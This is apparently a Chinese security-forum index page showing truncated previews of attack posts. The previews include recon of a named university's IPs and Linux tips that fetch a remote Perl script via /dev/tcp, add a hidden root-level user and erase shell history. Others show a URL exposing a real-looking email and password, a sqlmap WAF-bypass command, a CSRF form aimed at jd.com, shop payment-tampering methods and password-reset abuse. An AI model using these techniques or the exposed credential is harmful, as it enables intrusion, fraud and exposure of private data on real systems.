友情目标:四川师范大学文理学院未深入.简单玩玩===================================、规则:静态。。 jsp二级域名下有很多动态~~125.71.200.234http://125.71.200.244/ConfigWeb%5CIndex.aspxGUID 应包含带 4 个短划线的 32 位数(xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx)。 过滤了先分析下,不用急着C段http://zfx.scnucas.com/...
/
2474 次浏览/
网络安全
Linux渗透爱好者的小技巧1.无wget nc等下载工具时下载文件exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0\n" >&5 && cat<&5 > c.pl2.Linux添加uid为0的用户useradd -o -u 0 cnbird3.bash去掉history记录export HISTSIZE=...
/
1496 次浏览/
网络安全
其实这样也可以钓鱼的...
/
1411 次浏览/
网络安全
GET传送漏洞案例分析(CCTV为例)GET真的安全吗?原理你要在硕大的CCTV去找1个传送漏洞貌似很难不过我们就来想下我们就来爬下::/cntv:passwd爬到了一位:http://jishi.cntv.cn/program/gugong100/01/index.shtml?usrid2011=a61911%40gmail.com&passwd_view=%C3%DC%B4a&passwd2011=a22561081给大家讲下原理,http://jishi...
/
1431 次浏览/
网络安全
SQLMAP绕WAF注入tamper插件python sqlmap/sqlmap.py -u 注入点 -v 3 --dbs --batch --tamper "space2morehash.py"...
/
1591 次浏览/
网络安全
<form action="https://wwww.jd.com" target="1" method="post" onsubmit="setTimeout('go()', 1);" id="2"><input type="submit"></input></form><script&...
/
1547 次浏览/
网络安全
商城支付漏洞三种方法 商城支付漏洞三种方法1,订单数,修改为负数 -1 看看返回2,提交订单时,抓取数据包,把当前金额改成0.1元,然后提交3,大面积购买数量 如100个数量,提交时抓取数据包,把数量改为100个 配合0.1元思路,实际上你只购买了1个手机,但你缺提交了100个手机,而支付金额0.1x10=1元...
/
1495 次浏览/
网络安全
GNU BASH漏洞远程检测工具(CVE-2014-6271)http://pan.baidu.com/s/1qWrzzHU 密码: d22q...
/
1628 次浏览/
网络安全
任意密码重置科普篇我们就拿https://www.xbankd.com作为例子来讲一般来说,任意密码重置,首先是13888888888 所谓的土豪金账号测试然后,我们注册一个用户,观察验证方式https://www.xbankd.com/password/verifyusername.html比如忘记密码功能我们随便定义1个可能存在的用户,如123456,TEST,ADMIN一般我们采取前两种,这里,有几种研究方法1,首先我们注册的用户,给我们发忘记密码,验证,接着攻击的用户...
/
1620 次浏览/
网络安全
MongoVUE 客户端工具下载官网:http://www.mongovue.com/测试Mongodb数据库未授权访问用的默认端口:27017 28017...